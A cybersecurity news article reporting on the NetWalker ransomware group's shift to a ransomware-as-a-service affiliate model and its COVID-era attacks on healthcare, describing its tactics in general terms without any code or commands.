Cybersecurity News

NetWalker Ransomware Expands Operations, Targeting Healthcare

NetWalker ransomware actors have exploited the healthcare sector throughout the COVID-19 crisis. Now, the hackers are pairing up with other cybercriminals to gain enterprise access.

healthcare ransomware attacks human-operated cyberattacks NetWalker Russian hackers

By Jessica Davis

- The NetWalker ransomware threat actors – a serious threat to the healthcare sector – has ramped up its business model, transitioning into a Ransomware-as-a-Service (Raas) model in an attempt to partner with other seasoned cybercriminals, according to a recent Advanced Intelligence report.

The healthcare sector has been a prime target for NetWalker through the pandemic. The hacking group was behind the ransomware attack on the website of Champaign-Urbana Public Health District in Illinois in mid-March.

In March, Microsoft detailed some its tactics alongside other human-operated ransomware groups, such as Maze and REvil. These groups all rely on similar techniques, such as credential theft and lateral movement, before later deploying a ransomware payload.

In the last two months as the impact of the pandemic increased, NetWalker has become “extremely active.” And it’s new business model will allow the group to collaborate with other cybercriminals who’ve already gained access to large networks and have the capability of disseminating ransomware.

Members of the hacking group began posting advertisements for a “ransomware affiliate program,” on March 19. NetWalker appears to be looking for groups that “prioritize quality, not quantity.” The researchers noted this preference is vastly different than typical Russian-based ransomware operations that commonly leverage brute-force attacks and mass production.

To gain further interest, NetWalker shared some of its victim-focused material, such as IP addresses, administrator access, and network-attached storage access, among other key elements. A month later, the group refreshed its advertisement asking for experienced hackers in an effort to create “an exclusive group of top-tier network intruders to execute its new RaaS business model.”

Trend Micro researchers recently reported NetWalker is now also leveraging fileless ransomware, written in PowerShell, and executed directly in memory without storing the virus on the disk. As a result, these attacks allow the hackers to maintain persistence and easily evade detection by abusing system tools.

NetWalker is also actively leveraging the COVID-19 crisis for its phishing campaigns, targeting individuals interested more information about the virus, as well as healthcare industry individuals and entities.

The hackers primarily distribute their ransomware through phishing schemes or spam emails, or through large-scale network infiltration. The group claims they’re able to first exfiltrate data from its victims and posts it online: a model made notorious by the Maze hacking group.

Further, the group will typically ask for a significant ransom demand from its victims, from hundreds of thousands to millions of dollars. Researchers explained NetWalker is rapidly evolving and highly credible, especially to the healthcare sector during the COVID-19 crisis. And it’s likely there will be more attacks and updates from the group in the coming weeks.

“NetWalker now claims a singular preference for network infiltration, which is novel to the Russian-speaking ransomware community,” researchers explained. “As a result, the threat actor is requiring its new affiliates to have pre-existing access to large networks.”

“NetWalker poses a significant threat, as it has been carrying out these high-profile attacks while simultaneously posting on the top-tier Russian-language DarkWeb forums in order to expand its operations and capabilities,” they added.

As ransomware attacks on healthcare providers rose 350 percent during Q4 2019, healthcare organizations should review key ransomware resources, paying particular attention to the human-operated methods, including insights from Check Point, Microsoft, the FBI,  the NSA, the Office for Civil Rights, and other security leaders.